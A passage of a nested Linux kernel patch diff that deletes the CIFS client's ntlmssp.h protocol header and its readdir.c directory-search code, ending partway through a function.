+-#define NT_STATUS_QUOTA_LIST_INCONSISTENT 0xC0000000 | 0x0266
+-#define NT_STATUS_FILE_IS_OFFLINE 0xC0000000 | 0x0267
+-#define NT_STATUS_NO_SUCH_JOB 0xC0000000 | 0xEDE	/* scheduler */
+-
+-#endif				/* _NTERR_H */
+diff --git a/fs/cifs/ntlmssp.h b/fs/cifs/ntlmssp.h
+deleted file mode 100644
+index 55758b9ec877e..0000000000000
+--- a/fs/cifs/ntlmssp.h
++++ /dev/null
+@@ -1,157 +0,0 @@
+-/* SPDX-License-Identifier: LGPL-2.1 */
+-/*
+- *
+- *   Copyright (c) International Business Machines  Corp., 2002,2007
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-
+-#define NTLMSSP_SIGNATURE "NTLMSSP"
+-/* Message Types */
+-#define NtLmNegotiate     cpu_to_le32(1)
+-#define NtLmChallenge     cpu_to_le32(2)
+-#define NtLmAuthenticate  cpu_to_le32(3)
+-#define UnknownMessage    cpu_to_le32(8)
+-
+-/* Negotiate Flags */
+-#define NTLMSSP_NEGOTIATE_UNICODE         0x01 /* Text strings are unicode */
+-#define NTLMSSP_NEGOTIATE_OEM             0x02 /* Text strings are in OEM */
+-#define NTLMSSP_REQUEST_TARGET            0x04 /* Srv returns its auth realm */
+-/* define reserved9                       0x08 */
+-#define NTLMSSP_NEGOTIATE_SIGN          0x0010 /* Request signing capability */
+-#define NTLMSSP_NEGOTIATE_SEAL          0x0020 /* Request confidentiality */
+-#define NTLMSSP_NEGOTIATE_DGRAM         0x0040
+-#define NTLMSSP_NEGOTIATE_LM_KEY        0x0080 /* Use LM session key */
+-/* defined reserved 8                   0x0100 */
+-#define NTLMSSP_NEGOTIATE_NTLM          0x0200 /* NTLM authentication */
+-#define NTLMSSP_NEGOTIATE_NT_ONLY       0x0400 /* Lanman not allowed */
+-#define NTLMSSP_ANONYMOUS               0x0800
+-#define NTLMSSP_NEGOTIATE_DOMAIN_SUPPLIED 0x1000 /* reserved6 */
+-#define NTLMSSP_NEGOTIATE_WORKSTATION_SUPPLIED 0x2000
+-#define NTLMSSP_NEGOTIATE_LOCAL_CALL    0x4000 /* client/server same machine */
+-#define NTLMSSP_NEGOTIATE_ALWAYS_SIGN   0x8000 /* Sign. All security levels  */
+-#define NTLMSSP_TARGET_TYPE_DOMAIN     0x10000
+-#define NTLMSSP_TARGET_TYPE_SERVER     0x20000
+-#define NTLMSSP_TARGET_TYPE_SHARE      0x40000
+-#define NTLMSSP_NEGOTIATE_EXTENDED_SEC 0x80000 /* NB:not related to NTLMv2 pwd*/
+-/* #define NTLMSSP_REQUEST_INIT_RESP     0x100000 */
+-#define NTLMSSP_NEGOTIATE_IDENTIFY    0x100000
+-#define NTLMSSP_REQUEST_ACCEPT_RESP   0x200000 /* reserved5 */
+-#define NTLMSSP_REQUEST_NON_NT_KEY    0x400000
+-#define NTLMSSP_NEGOTIATE_TARGET_INFO 0x800000
+-/* #define reserved4                 0x1000000 */
+-#define NTLMSSP_NEGOTIATE_VERSION    0x2000000 /* we only set for SMB2+ */
+-/* #define reserved3                 0x4000000 */
+-/* #define reserved2                 0x8000000 */
+-/* #define reserved1                0x10000000 */
+-#define NTLMSSP_NEGOTIATE_128       0x20000000
+-#define NTLMSSP_NEGOTIATE_KEY_XCH   0x40000000
+-#define NTLMSSP_NEGOTIATE_56        0x80000000
+-
+-/* Define AV Pair Field IDs */
+-enum av_field_type {
+-	NTLMSSP_AV_EOL = 0,
+-	NTLMSSP_AV_NB_COMPUTER_NAME,
+-	NTLMSSP_AV_NB_DOMAIN_NAME,
+-	NTLMSSP_AV_DNS_COMPUTER_NAME,
+-	NTLMSSP_AV_DNS_DOMAIN_NAME,
+-	NTLMSSP_AV_DNS_TREE_NAME,
+-	NTLMSSP_AV_FLAGS,
+-	NTLMSSP_AV_TIMESTAMP,
+-	NTLMSSP_AV_RESTRICTION,
+-	NTLMSSP_AV_TARGET_NAME,
+-	NTLMSSP_AV_CHANNEL_BINDINGS
+-};
+-
+-/* Although typedefs are not commonly used for structure definitions */
+-/* in the Linux kernel, in this particular case they are useful      */
+-/* to more closely match the standards document for NTLMSSP from     */
+-/* OpenGroup and to make the code more closely match the standard in */
+-/* appearance */
+-
+-typedef struct _SECURITY_BUFFER {
+-	__le16 Length;
+-	__le16 MaximumLength;
+-	__le32 BufferOffset;	/* offset to buffer */
+-} __attribute__((packed)) SECURITY_BUFFER;
+-
+-typedef struct _NEGOTIATE_MESSAGE {
+-	__u8 Signature[sizeof(NTLMSSP_SIGNATURE)];
+-	__le32 MessageType;     /* NtLmNegotiate = 1 */
+-	__le32 NegotiateFlags;
+-	SECURITY_BUFFER DomainName;	/* RFC 1001 style and ASCII */
+-	SECURITY_BUFFER WorkstationName;	/* RFC 1001 and ASCII */
+-	/* SECURITY_BUFFER for version info not present since we
+-	   do not set the version is present flag */
+-	char DomainString[0];
+-	/* followed by WorkstationString */
+-} __attribute__((packed)) NEGOTIATE_MESSAGE, *PNEGOTIATE_MESSAGE;
+-
+-#define NTLMSSP_REVISION_W2K3 0x0F
+-
+-/* See MS-NLMP section 2.2.2.10 */
+-struct ntlmssp_version {
+-	__u8	ProductMajorVersion;
+-	__u8	ProductMinorVersion;
+-	__le16	ProductBuild; /* we send the cifs.ko module version here */
+-	__u8	Reserved[3];
+-	__u8	NTLMRevisionCurrent; /* currently 0x0F */
+-} __packed;
+-
+-/* see MS-NLMP section 2.2.1.1 */
+-struct negotiate_message {
+-	__u8 Signature[sizeof(NTLMSSP_SIGNATURE)];
+-	__le32 MessageType;     /* NtLmNegotiate = 1 */
+-	__le32 NegotiateFlags;
+-	SECURITY_BUFFER DomainName;	/* RFC 1001 style and ASCII */
+-	SECURITY_BUFFER WorkstationName;	/* RFC 1001 and ASCII */
+-	struct	ntlmssp_version Version;
+-	/* SECURITY_BUFFER */
+-	char DomainString[];
+-	/* followed by WorkstationString */
+-} __packed;
+-
+-typedef struct _CHALLENGE_MESSAGE {
+-	__u8 Signature[sizeof(NTLMSSP_SIGNATURE)];
+-	__le32 MessageType;   /* NtLmChallenge = 2 */
+-	SECURITY_BUFFER TargetName;
+-	__le32 NegotiateFlags;
+-	__u8 Challenge[CIFS_CRYPTO_KEY_SIZE];
+-	__u8 Reserved[8];
+-	SECURITY_BUFFER TargetInfoArray;
+-	/* SECURITY_BUFFER for version info not present since we
+-	   do not set the version is present flag */
+-} __attribute__((packed)) CHALLENGE_MESSAGE, *PCHALLENGE_MESSAGE;
+-
+-typedef struct _AUTHENTICATE_MESSAGE {
+-	__u8 Signature[sizeof(NTLMSSP_SIGNATURE)];
+-	__le32 MessageType;  /* NtLmsAuthenticate = 3 */
+-	SECURITY_BUFFER LmChallengeResponse;
+-	SECURITY_BUFFER NtChallengeResponse;
+-	SECURITY_BUFFER DomainName;
+-	SECURITY_BUFFER UserName;
+-	SECURITY_BUFFER WorkstationName;
+-	SECURITY_BUFFER SessionKey;
+-	__le32 NegotiateFlags;
+-	/* SECURITY_BUFFER for version info not present since we
+-	   do not set the version is present flag */
+-	char UserString[0];
+-} __attribute__((packed)) AUTHENTICATE_MESSAGE, *PAUTHENTICATE_MESSAGE;
+-
+-/*
+- * Size of the session key (crypto key encrypted with the password
+- */
+-
+-int decode_ntlmssp_challenge(char *bcc_ptr, int blob_len, struct cifs_ses *ses);
+-int build_ntlmssp_negotiate_blob(unsigned char **pbuffer, u16 *buflen,
+-				 struct cifs_ses *ses,
+-				 struct TCP_Server_Info *server,
+-				 const struct nls_table *nls_cp);
+-int build_ntlmssp_smb3_negotiate_blob(unsigned char **pbuffer, u16 *buflen,
+-				 struct cifs_ses *ses,
+-				 struct TCP_Server_Info *server,
+-				 const struct nls_table *nls_cp);
+-int build_ntlmssp_auth_blob(unsigned char **pbuffer, u16 *buflen,
+-			struct cifs_ses *ses,
+-			struct TCP_Server_Info *server,
+-			const struct nls_table *nls_cp);
+diff --git a/fs/cifs/readdir.c b/fs/cifs/readdir.c
+deleted file mode 100644
+index 2d75ba5aaa8ad..0000000000000
+--- a/fs/cifs/readdir.c
++++ /dev/null
+@@ -1,1237 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Directory search handling
+- *
+- *   Copyright (C) International Business Machines  Corp., 2004, 2008
+- *   Copyright (C) Red Hat, Inc., 2011
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *
+- */
+-#include <linux/fs.h>
+-#include <linux/pagemap.h>
+-#include <linux/slab.h>
+-#include <linux/stat.h>
+-#include "cifspdu.h"
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifs_unicode.h"
+-#include "cifs_debug.h"
+-#include "cifs_fs_sb.h"
+-#include "cifsfs.h"
+-#include "smb2proto.h"
+-#include "fs_context.h"
+-#include "cached_dir.h"
+-
+-/*
+- * To be safe - for UCS to UTF-8 with strings loaded with the rare long
+- * characters alloc more to account for such multibyte target UTF-8
+- * characters.
+- */
+-#define UNICODE_NAME_MAX ((4 * NAME_MAX) + 2)
+-
+-#ifdef CONFIG_CIFS_DEBUG2
+-static void dump_cifs_file_struct(struct file *file, char *label)
+-{
+-	struct cifsFileInfo *cf;
+-
+-	if (file) {
+-		cf = file->private_data;
+-		if (cf == NULL) {
+-			cifs_dbg(FYI, "empty cifs private file data\n");
+-			return;
+-		}
+-		if (cf->invalidHandle)
+-			cifs_dbg(FYI, "Invalid handle\n");
+-		if (cf->srch_inf.endOfSearch)
+-			cifs_dbg(FYI, "end of search\n");
+-		if (cf->srch_inf.emptyDir)
+-			cifs_dbg(FYI, "empty dir\n");
+-	}
+-}
+-#else
+-static inline void dump_cifs_file_struct(struct file *file, char *label)
+-{
+-}
+-#endif /* DEBUG2 */
+-
+-/*
+- * Attempt to preload the dcache with the results from the FIND_FIRST/NEXT
+- *
+- * Find the dentry that matches "name". If there isn't one, create one. If it's
+- * a negative dentry or the uniqueid or filetype(mode) changed,
+- * then drop it and recreate it.
+- */
+-static void
+-cifs_prime_dcache(struct dentry *parent, struct qstr *name,
+-		    struct cifs_fattr *fattr)
+-{
+-	struct dentry *dentry, *alias;
+-	struct inode *inode;
+-	struct super_block *sb = parent->d_sb;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	DECLARE_WAIT_QUEUE_HEAD_ONSTACK(wq);
+-
+-	cifs_dbg(FYI, "%s: for %s\n", __func__, name->name);
+-
+-	dentry = d_hash_and_lookup(parent, name);
+-	if (!dentry) {
+-		/*
+-		 * If we know that the inode will need to be revalidated
+-		 * immediately, then don't create a new dentry for it.
+-		 * We'll end up doing an on the wire call either way and
+-		 * this spares us an invalidation.
+-		 */
+-		if (fattr->cf_flags & CIFS_FATTR_NEED_REVAL)
+-			return;
+-retry:
+-		dentry = d_alloc_parallel(parent, name, &wq);
+-	}
+-	if (IS_ERR(dentry))
+-		return;
+-	if (!d_in_lookup(dentry)) {
+-		inode = d_inode(dentry);
+-		if (inode) {
+-			if (d_mountpoint(dentry)) {
+-				dput(dentry);
+-				return;
+-			}
+-			/*
+-			 * If we're generating inode numbers, then we don't
+-			 * want to clobber the existing one with the one that
+-			 * the readdir code created.
+-			 */
+-			if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM))
+-				fattr->cf_uniqueid = CIFS_I(inode)->uniqueid;
+-
+-			/* update inode in place
+-			 * if both i_ino and i_mode didn't change */
+-			if (CIFS_I(inode)->uniqueid == fattr->cf_uniqueid &&
+-			    cifs_fattr_to_inode(inode, fattr) == 0) {
+-				dput(dentry);
+-				return;
+-			}
+-		}
+-		d_invalidate(dentry);
+-		dput(dentry);
+-		goto retry;
+-	} else {
+-		inode = cifs_iget(sb, fattr);
+-		if (!inode)
+-			inode = ERR_PTR(-ENOMEM);
+-		alias = d_splice_alias(inode, dentry);
+-		d_lookup_done(dentry);
+-		if (alias && !IS_ERR(alias))
+-			dput(alias);
+-	}
+-	dput(dentry);
+-}
+-
+-static bool reparse_file_needs_reval(const struct cifs_fattr *fattr)
+-{
+-	if (!(fattr->cf_cifsattrs & ATTR_REPARSE))
+-		return false;
+-	/*
+-	 * The DFS tags should be only intepreted by server side as per
+-	 * MS-FSCC 2.1.2.1, but let's include them anyway.
+-	 *
+-	 * Besides, if cf_cifstag is unset (0), then we still need it to be
+-	 * revalidated to know exactly what reparse point it is.
+-	 */
+-	switch (fattr->cf_cifstag) {
+-	case IO_REPARSE_TAG_DFS:
+-	case IO_REPARSE_TAG_DFSR:
+-	case IO_REPARSE_TAG_SYMLINK:
+-	case IO_REPARSE_TAG_NFS:
+-	case 0:
+-		return true;
+-	}
+-	return false;
+-}
+-
+-static void
+-cifs_fill_common_info(struct cifs_fattr *fattr, struct cifs_sb_info *cifs_sb)
+-{
+-	fattr->cf_uid = cifs_sb->ctx->linux_uid;
+-	fattr->cf_gid = cifs_sb->ctx->linux_gid;
+-
+-	/*
+-	 * The IO_REPARSE_TAG_LX_ tags originally were used by WSL but they
+-	 * are preferred by the Linux client in some cases since, unlike
+-	 * the NFS reparse tag (or EAs), they don't require an extra query
+-	 * to determine which type of special file they represent.
+-	 * TODO: go through all documented  reparse tags to see if we can
+-	 * reasonably map some of them to directories vs. files vs. symlinks
+-	 */
+-	if (fattr->cf_cifsattrs & ATTR_DIRECTORY) {
+-		fattr->cf_mode = S_IFDIR | cifs_sb->ctx->dir_mode;
+-		fattr->cf_dtype = DT_DIR;
+-	} else if (fattr->cf_cifstag == IO_REPARSE_TAG_LX_SYMLINK) {
+-		fattr->cf_mode |= S_IFLNK | cifs_sb->ctx->file_mode;
+-		fattr->cf_dtype = DT_LNK;
+-	} else if (fattr->cf_cifstag == IO_REPARSE_TAG_LX_FIFO) {
+-		fattr->cf_mode |= S_IFIFO | cifs_sb->ctx->file_mode;
+-		fattr->cf_dtype = DT_FIFO;
+-	} else if (fattr->cf_cifstag == IO_REPARSE_TAG_AF_UNIX) {
+-		fattr->cf_mode |= S_IFSOCK | cifs_sb->ctx->file_mode;
+-		fattr->cf_dtype = DT_SOCK;
+-	} else if (fattr->cf_cifstag == IO_REPARSE_TAG_LX_CHR) {
+-		fattr->cf_mode |= S_IFCHR | cifs_sb->ctx->file_mode;
+-		fattr->cf_dtype = DT_CHR;
+-	} else if (fattr->cf_cifstag == IO_REPARSE_TAG_LX_BLK) {
+-		fattr->cf_mode |= S_IFBLK | cifs_sb->ctx->file_mode;
+-		fattr->cf_dtype = DT_BLK;
+-	} else { /* TODO: should we mark some other reparse points (like DFSR) as directories? */
+-		fattr->cf_mode = S_IFREG | cifs_sb->ctx->file_mode;
+-		fattr->cf_dtype = DT_REG;
+-	}
+-
+-	/*
+-	 * We need to revalidate it further to make a decision about whether it
+-	 * is a symbolic link, DFS referral or a reparse point with a direct
+-	 * access like junctions, deduplicated files, NFS symlinks.
+-	 */
+-	if (reparse_file_needs_reval(fattr))
+-		fattr->cf_flags |= CIFS_FATTR_NEED_REVAL;
+-
+-	/* non-unix readdir doesn't provide nlink */
+-	fattr->cf_flags |= CIFS_FATTR_UNKNOWN_NLINK;
+-
+-	if (fattr->cf_cifsattrs & ATTR_READONLY)
+-		fattr->cf_mode &= ~S_IWUGO;
+-
+-	/*
+-	 * We of course don't get ACL info in FIND_FIRST/NEXT results, so
+-	 * mark it for revalidation so that "ls -l" will look right. It might
+-	 * be super-slow, but if we don't do this then the ownership of files
+-	 * may look wrong since the inodes may not have timed out by the time
+-	 * "ls" does a stat() call on them.
+-	 */
+-	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_ACL) ||
+-	    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MODE_FROM_SID))
+-		fattr->cf_flags |= CIFS_FATTR_NEED_REVAL;
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UNX_EMUL &&
+-	    fattr->cf_cifsattrs & ATTR_SYSTEM) {
+-		if (fattr->cf_eof == 0)  {
+-			fattr->cf_mode &= ~S_IFMT;
+-			fattr->cf_mode |= S_IFIFO;
+-			fattr->cf_dtype = DT_FIFO;
+-		} else {
+-			/*
+-			 * trying to get the type and mode via SFU can be slow,
+-			 * so just call those regular files for now, and mark
+-			 * for reval
+-			 */
+-			fattr->cf_flags |= CIFS_FATTR_NEED_REVAL;
+-		}
+-	}
+-}
+-
+-/* Fill a cifs_fattr struct with info from SMB_FIND_FILE_POSIX_INFO. */
+-static void
+-cifs_posix_to_fattr(struct cifs_fattr *fattr, struct smb2_posix_info *info,
+-		    struct cifs_sb_info *cifs_sb)
+-{
+-	struct smb2_posix_info_parsed parsed;
+-
+-	posix_info_parse(info, NULL, &parsed);
+-
+-	memset(fattr, 0, sizeof(*fattr));
+-	fattr->cf_uniqueid = le64_to_cpu(info->Inode);
+-	fattr->cf_bytes = le64_to_cpu(info->AllocationSize);
+-	fattr->cf_eof = le64_to_cpu(info->EndOfFile);
+-
+-	fattr->cf_atime = cifs_NTtimeToUnix(info->LastAccessTime);
+-	fattr->cf_mtime = cifs_NTtimeToUnix(info->LastWriteTime);
+-	fattr->cf_ctime = cifs_NTtimeToUnix(info->CreationTime);
+-
+-	fattr->cf_nlink = le32_to_cpu(info->HardLinks);
+-	fattr->cf_cifsattrs = le32_to_cpu(info->DosAttributes);
+-
+-	/*
+-	 * Since we set the inode type below we need to mask off
+-	 * to avoid strange results if bits set above.
+-	 * XXX: why not make server&client use the type bits?
+-	 */
+-	fattr->cf_mode = le32_to_cpu(info->Mode) & ~S_IFMT;
+-
+-	cifs_dbg(FYI, "posix fattr: dev %d, reparse %d, mode %o\n",
+-		 le32_to_cpu(info->DeviceId),
+-		 le32_to_cpu(info->ReparseTag),
+-		 le32_to_cpu(info->Mode));
+-
+-	if (fattr->cf_cifsattrs & ATTR_DIRECTORY) {
+-		fattr->cf_mode |= S_IFDIR;
+-		fattr->cf_dtype = DT_DIR;
+-	} else {
+-		/*
+-		 * mark anything that is not a dir as regular
+-		 * file. special files should have the REPARSE
+-		 * attribute and will be marked as needing revaluation
+-		 */
+-		fattr->cf_mode |= S_IFREG;
+-		fattr->cf_dtype = DT_REG;
+-	}
+-
+-	if (reparse_file_needs_reval(fattr))
+-		fattr->cf_flags |= CIFS_FATTR_NEED_REVAL;
+-
+-	sid_to_id(cifs_sb, &parsed.owner, fattr, SIDOWNER);
+-	sid_to_id(cifs_sb, &parsed.group, fattr, SIDGROUP);
+-}
+-
+-static void __dir_info_to_fattr(struct cifs_fattr *fattr, const void *info)
+-{
+-	const FILE_DIRECTORY_INFO *fi = info;
+-
+-	memset(fattr, 0, sizeof(*fattr));
+-	fattr->cf_cifsattrs = le32_to_cpu(fi->ExtFileAttributes);
+-	fattr->cf_eof = le64_to_cpu(fi->EndOfFile);
+-	fattr->cf_bytes = le64_to_cpu(fi->AllocationSize);
+-	fattr->cf_createtime = le64_to_cpu(fi->CreationTime);
+-	fattr->cf_atime = cifs_NTtimeToUnix(fi->LastAccessTime);
+-	fattr->cf_ctime = cifs_NTtimeToUnix(fi->ChangeTime);
+-	fattr->cf_mtime = cifs_NTtimeToUnix(fi->LastWriteTime);
+-}
+-
+-void
+-cifs_dir_info_to_fattr(struct cifs_fattr *fattr, FILE_DIRECTORY_INFO *info,
+-		       struct cifs_sb_info *cifs_sb)
+-{
+-	__dir_info_to_fattr(fattr, info);
+-	cifs_fill_common_info(fattr, cifs_sb);
+-}
+-
+-static void cifs_fulldir_info_to_fattr(struct cifs_fattr *fattr,
+-				       SEARCH_ID_FULL_DIR_INFO *info,
+-				       struct cifs_sb_info *cifs_sb)
+-{
+-	__dir_info_to_fattr(fattr, info);
+-
+-	/* See MS-FSCC 2.4.19 FileIdFullDirectoryInformation */
+-	if (fattr->cf_cifsattrs & ATTR_REPARSE)
+-		fattr->cf_cifstag = le32_to_cpu(info->EaSize);
+-	cifs_fill_common_info(fattr, cifs_sb);
+-}
+-
+-static void
+-cifs_std_info_to_fattr(struct cifs_fattr *fattr, FIND_FILE_STANDARD_INFO *info,
+-		       struct cifs_sb_info *cifs_sb)
+-{
+-	int offset = cifs_sb_master_tcon(cifs_sb)->ses->server->timeAdj;
+-
+-	memset(fattr, 0, sizeof(*fattr));
+-	fattr->cf_atime = cnvrtDosUnixTm(info->LastAccessDate,
+-					    info->LastAccessTime, offset);
+-	fattr->cf_ctime = cnvrtDosUnixTm(info->LastWriteDate,
+-					    info->LastWriteTime, offset);
+-	fattr->cf_mtime = cnvrtDosUnixTm(info->LastWriteDate,
+-					    info->LastWriteTime, offset);
+-
+-	fattr->cf_cifsattrs = le16_to_cpu(info->Attributes);
+-	fattr->cf_bytes = le32_to_cpu(info->AllocationSize);
+-	fattr->cf_eof = le32_to_cpu(info->DataSize);
+-
+-	cifs_fill_common_info(fattr, cifs_sb);
+-}
+-
+-/* BB eventually need to add the following helper function to
+-      resolve NT_STATUS_STOPPED_ON_SYMLINK return code when
+-      we try to do FindFirst on (NTFS) directory symlinks */
+-/*
+-int get_symlink_reparse_path(char *full_path, struct cifs_sb_info *cifs_sb,
+-			     unsigned int xid)
+-{
+-	__u16 fid;
+-	int len;
+-	int oplock = 0;
+-	int rc;
+-	struct cifs_tcon *ptcon = cifs_sb_tcon(cifs_sb);
+-	char *tmpbuffer;
+-
+-	rc = CIFSSMBOpen(xid, ptcon, full_path, FILE_OPEN, GENERIC_READ,
+-			OPEN_REPARSE_POINT, &fid, &oplock, NULL,
+-			cifs_sb->local_nls,
+-			cifs_remap(cifs_sb);
+-	if (!rc) {
+-		tmpbuffer = kmalloc(maxpath);
+-		rc = CIFSSMBQueryReparseLinkInfo(xid, ptcon, full_path,
+-				tmpbuffer,
+-				maxpath -1,
+-				fid,
+-				cifs_sb->local_nls);
+-		if (CIFSSMBClose(xid, ptcon, fid)) {
+-			cifs_dbg(FYI, "Error closing temporary reparsepoint open\n");
+-		}
+-	}
+-}
+- */
+-
+-static int
+-_initiate_cifs_search(const unsigned int xid, struct file *file,
+-		     const char *full_path)
+-{
+-	__u16 search_flags;
+-	int rc = 0;
+-	struct cifsFileInfo *cifsFile;
+-	struct cifs_sb_info *cifs_sb = CIFS_FILE_SB(file);
+-	struct tcon_link *tlink = NULL;
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-
+-	if (file->private_data == NULL) {
+-		tlink = cifs_sb_tlink(cifs_sb);
+-		if (IS_ERR(tlink))
+-			return PTR_ERR(tlink);
+-
+-		cifsFile = kzalloc(sizeof(struct cifsFileInfo), GFP_KERNEL);
+-		if (cifsFile == NULL) {
+-			rc = -ENOMEM;
+-			goto error_exit;
+-		}
+-		spin_lock_init(&cifsFile->file_info_lock);
+-		file->private_data = cifsFile;
+-		cifsFile->tlink = cifs_get_tlink(tlink);
+-		tcon = tlink_tcon(tlink);
+-	} else {
+-		cifsFile = file->private_data;
+-		tcon = tlink_tcon(cifsFile->tlink);
+-	}
+-
+-	server = tcon->ses->server;
+-
+-	if (!server->ops->query_dir_first) {
+-		rc = -ENOSYS;
+-		goto error_exit;
+-	}
+-
+-	cifsFile->invalidHandle = true;
+-	cifsFile->srch_inf.endOfSearch = false;
+-
+-	cifs_dbg(FYI, "Full path: %s start at: %lld\n", full_path, file->f_pos);
+-
+-ffirst_retry:
+-	/* test for Unix extensions */
+-	/* but now check for them on the share/mount not on the SMB session */
+-	/* if (cap_unix(tcon->ses) { */
+-	if (tcon->unix_ext)
+-		cifsFile->srch_inf.info_level = SMB_FIND_FILE_UNIX;
+-	else if (tcon->posix_extensions)
+-		cifsFile->srch_inf.info_level = SMB_FIND_FILE_POSIX_INFO;
+-	else if ((tcon->ses->capabilities &
+-		  tcon->ses->server->vals->cap_nt_find) == 0) {
+-		cifsFile->srch_inf.info_level = SMB_FIND_FILE_INFO_STANDARD;
+-	} else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM) {
+-		cifsFile->srch_inf.info_level = SMB_FIND_FILE_ID_FULL_DIR_INFO;
+-	} else /* not srvinos - BB fixme add check for backlevel? */ {
+-		cifsFile->srch_inf.info_level = SMB_FIND_FILE_DIRECTORY_INFO;
+-	}
+-
+-	search_flags = CIFS_SEARCH_CLOSE_AT_END | CIFS_SEARCH_RETURN_RESUME;
+-	if (backup_cred(cifs_sb))
+-		search_flags |= CIFS_SEARCH_BACKUP_SEARCH;
+-
+-	rc = server->ops->query_dir_first(xid, tcon, full_path, cifs_sb,
+-					  &cifsFile->fid, search_flags,
+-					  &cifsFile->srch_inf);
+-
+-	if (rc == 0)
+-		cifsFile->invalidHandle = false;
+-	/* BB add following call to handle readdir on new NTFS symlink errors
+-	else if STATUS_STOPPED_ON_SYMLINK
+-		call get_symlink_reparse_path and retry with new path */
+-	else if ((rc == -EOPNOTSUPP) &&
+-		(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM)) {
+-		cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_SERVER_INUM;
+-		goto ffirst_retry;
+-	}
+-error_exit:
+-	cifs_put_tlink(tlink);
+-	return rc;
+-}
+-
+-static int
+-initiate_cifs_search(const unsigned int xid, struct file *file,
+-		     const char *full_path)
+-{
+-	int rc, retry_count = 0;
+-
+-	do {
+-		rc = _initiate_cifs_search(xid, file, full_path);
+-		/*
+-		 * If we don't have enough credits to start reading the
+-		 * directory just try again after short wait.
+-		 */
+-		if (rc != -EDEADLK)
+-			break;
+-
+-		usleep_range(512, 2048);
+-	} while (retry_count++ < 5);
+-
+-	return rc;
+-}
+-
+-/* return length of unicode string in bytes */
+-static int cifs_unicode_bytelen(const char *str)
+-{
+-	int len;
+-	const __le16 *ustr = (const __le16 *)str;
+-
+-	for (len = 0; len <= PATH_MAX; len++) {
+-		if (ustr[len] == 0)
+-			return len << 1;
+-	}
+-	cifs_dbg(FYI, "Unicode string longer than PATH_MAX found\n");
+-	return len << 1;
+-}
+-
+-static char *nxt_dir_entry(char *old_entry, char *end_of_smb, int level)
+-{
+-	char *new_entry;
+-	FILE_DIRECTORY_INFO *pDirInfo = (FILE_DIRECTORY_INFO *)old_entry;
+-
+-	if (level == SMB_FIND_FILE_INFO_STANDARD) {
+-		FIND_FILE_STANDARD_INFO *pfData;
+-		pfData = (FIND_FILE_STANDARD_INFO *)pDirInfo;
+-
+-		new_entry = old_entry + sizeof(FIND_FILE_STANDARD_INFO) +
+-				pfData->FileNameLength;
+-	} else {
+-		u32 next_offset = le32_to_cpu(pDirInfo->NextEntryOffset);
+-
+-		if (old_entry + next_offset < old_entry) {
+-			cifs_dbg(VFS, "Invalid offset %u\n", next_offset);
+-			return NULL;
+-		}
+-		new_entry = old_entry + next_offset;
+-	}
+-	cifs_dbg(FYI, "new entry %p old entry %p\n", new_entry, old_entry);
+-	/* validate that new_entry is not past end of SMB */
+-	if (new_entry >= end_of_smb) {
+-		cifs_dbg(VFS, "search entry %p began after end of SMB %p old entry %p\n",
+-			 new_entry, end_of_smb, old_entry);
+-		return NULL;
+-	} else if (((level == SMB_FIND_FILE_INFO_STANDARD) &&
+-		    (new_entry + sizeof(FIND_FILE_STANDARD_INFO) > end_of_smb))
+-		  || ((level != SMB_FIND_FILE_INFO_STANDARD) &&
+-		   (new_entry + sizeof(FILE_DIRECTORY_INFO) > end_of_smb)))  {
+-		cifs_dbg(VFS, "search entry %p extends after end of SMB %p\n",
+-			 new_entry, end_of_smb);
+-		return NULL;
+-	} else
+-		return new_entry;
+-
+-}
+-
+-struct cifs_dirent {
+-	const char	*name;
+-	size_t		namelen;
+-	u32		resume_key;
+-	u64		ino;
+-};
+-
+-static void cifs_fill_dirent_posix(struct cifs_dirent *de,
+-				   const struct smb2_posix_info *info)
+-{
+-	struct smb2_posix_info_parsed parsed;
+-
+-	/* payload should have already been checked at this point */
+-	if (posix_info_parse(info, NULL, &parsed) < 0) {
+-		cifs_dbg(VFS, "Invalid POSIX info payload\n");
+-		return;
+-	}
+-
+-	de->name = parsed.name;
+-	de->namelen = parsed.name_len;
+-	de->resume_key = info->Ignored;
+-	de->ino = le64_to_cpu(info->Inode);
+-}
+-
+-static void cifs_fill_dirent_unix(struct cifs_dirent *de,
+-		const FILE_UNIX_INFO *info, bool is_unicode)
+-{
+-	de->name = &info->FileName[0];
+-	if (is_unicode)
+-		de->namelen = cifs_unicode_bytelen(de->name);
+-	else
+-		de->namelen = strnlen(de->name, PATH_MAX);
+-	de->resume_key = info->ResumeKey;
+-	de->ino = le64_to_cpu(info->basic.UniqueId);
+-}
+-
+-static void cifs_fill_dirent_dir(struct cifs_dirent *de,
+-		const FILE_DIRECTORY_INFO *info)
+-{
+-	de->name = &info->FileName[0];
+-	de->namelen = le32_to_cpu(info->FileNameLength);
+-	de->resume_key = info->FileIndex;
+-}
+-
+-static void cifs_fill_dirent_full(struct cifs_dirent *de,
+-		const FILE_FULL_DIRECTORY_INFO *info)
+-{
+-	de->name = &info->FileName[0];
+-	de->namelen = le32_to_cpu(info->FileNameLength);
+-	de->resume_key = info->FileIndex;
+-}
+-
+-static void cifs_fill_dirent_search(struct cifs_dirent *de,
+-		const SEARCH_ID_FULL_DIR_INFO *info)
+-{
+-	de->name = &info->FileName[0];
+-	de->namelen = le32_to_cpu(info->FileNameLength);
+-	de->resume_key = info->FileIndex;
+-	de->ino = le64_to_cpu(info->UniqueId);
+-}
+-
+-static void cifs_fill_dirent_both(struct cifs_dirent *de,
+-		const FILE_BOTH_DIRECTORY_INFO *info)
+-{
+-	de->name = &info->FileName[0];
+-	de->namelen = le32_to_cpu(info->FileNameLength);
+-	de->resume_key = info->FileIndex;
+-}
+-
+-static void cifs_fill_dirent_std(struct cifs_dirent *de,
+-		const FIND_FILE_STANDARD_INFO *info)
+-{
+-	de->name = &info->FileName[0];
+-	/* one byte length, no endianess conversion */
